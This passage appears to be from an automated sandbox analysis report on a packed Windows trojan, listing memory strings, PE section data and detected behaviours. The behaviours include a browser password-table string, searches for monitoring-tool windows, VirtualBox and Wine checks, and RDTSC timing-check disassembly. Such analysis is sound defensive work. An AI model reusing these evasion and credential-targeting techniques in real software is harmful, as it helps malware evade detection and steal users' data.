              Source: file.exe, 00000000.00000003.1960589672.0000000006002000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1966162079.0000000006147000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1965733360.0000000006148000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981971533.0000000001242000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1958851114.0000000006002000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1952714529.00000000060BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1953321549.00000000060BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1960171148.0000000006131000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1980961565.0000000005C22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1955387800.00000000060E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1964824268.0000000006140000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1949755579.000000000600A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1949568463.0000000005E02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1966747097.0000000006144000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1962073711.000000000613E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1960310363.000000000600E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1961020025.0000000006005000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1953587800.000000000600C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1949849298.0000000005C66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1953028725.0000000006003000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1967307798.0000000006158000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1958595362.0000000006010000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1958997035.000000000610F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1951170039.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1952817426.0000000006004000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1959598938.0000000006005000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1963678064.0000000006133000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1954623805.0000000006006000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1953799268.0000000006009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1959142417.0000000006218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1960739881.000000000612F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1965927670.000000000600C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1953901701.00000000060C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1950992984.00000000060B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1956960632.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1961327334.000000000625B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1956300860.00000000061D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1956574408.00000000060F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1958706209.0000000006116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1957240166.00000000061EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1951885844.0000000006008000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1963971915.0000000006007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1949945225.0000000006011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9993148053278689
              Source: file.exeStatic PE information: Section: hyifqwux ZLIB complexity 0.9945358427444307
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/64@9/6
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.1727314107.0000000005B65000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeVirustotal: Detection: 45%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1932,i,6400708159271862020,17994335093903247733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1996,i,9808520038763490769,5132435854326033979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1932,i,6400708159271862020,17994335093903247733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1996,i,9808520038763490769,5132435854326033979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1826816 > 1048576
              Source: file.exeStatic PE information: Raw size of hyifqwux is bigger than: 0x100000 < 0x194000
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1ca861 should be: 0x1c2b90
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: hyifqwux
              Source: file.exeStatic PE information: section name: kzjybfum
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B6FDCD push esp; iretd 0_3_05B6FEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05B72018 push esi; iretd 0_3_05B72019
              Source: file.exeStatic PE information: section name: entropy: 7.975063363546765
              Source: file.exeStatic PE information: section name: hyifqwux entropy: 7.953963317335997

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 413835 second address: 41383C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41383C second address: 413849 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5AF4D0D7C8h 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4139A4 second address: 4139B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF500675Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4139B8 second address: 4139D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5AF4D0D7D9h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4139D9 second address: 413A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF500675Eh 0x00000009 pop ecx 0x0000000a popad 0x0000000b ja 00007F5AF5006771h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5AF5006761h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 413DC2 second address: 413DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416783 second address: 41679B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F5AF500675Ch 0x00000012 jo 00007F5AF5006756h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41679B second address: 4167B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F5AF4D0D7CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4167B5 second address: 4167B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4168A8 second address: 416958 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5AF4D0D7C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edx 0x00000010 je 00007F5AF4D0D7CCh 0x00000016 jc 00007F5AF4D0D7C6h 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007F5AF4D0D7CDh 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push ecx 0x00000029 push edx 0x0000002a push esi 0x0000002b pop esi 0x0000002c pop edx 0x0000002d pop ecx 0x0000002e pop eax 0x0000002f mov ch, DCh 0x00000031 push 00000003h 0x00000033 clc 0x00000034 add cx, B2CEh 0x00000039 push 00000000h 0x0000003b push 00000003h 0x0000003d call 00007F5AF4D0D7C9h 0x00000042 jmp 00007F5AF4D0D7D0h 0x00000047 push eax 0x00000048 jmp 00007F5AF4D0D7D9h 0x0000004d mov eax, dword ptr [esp+04h] 0x00000051 jmp 00007F5AF4D0D7CBh 0x00000056 mov eax, dword ptr [eax] 0x00000058 jmp 00007F5AF4D0D7CCh 0x0000005d mov dword ptr [esp+04h], eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 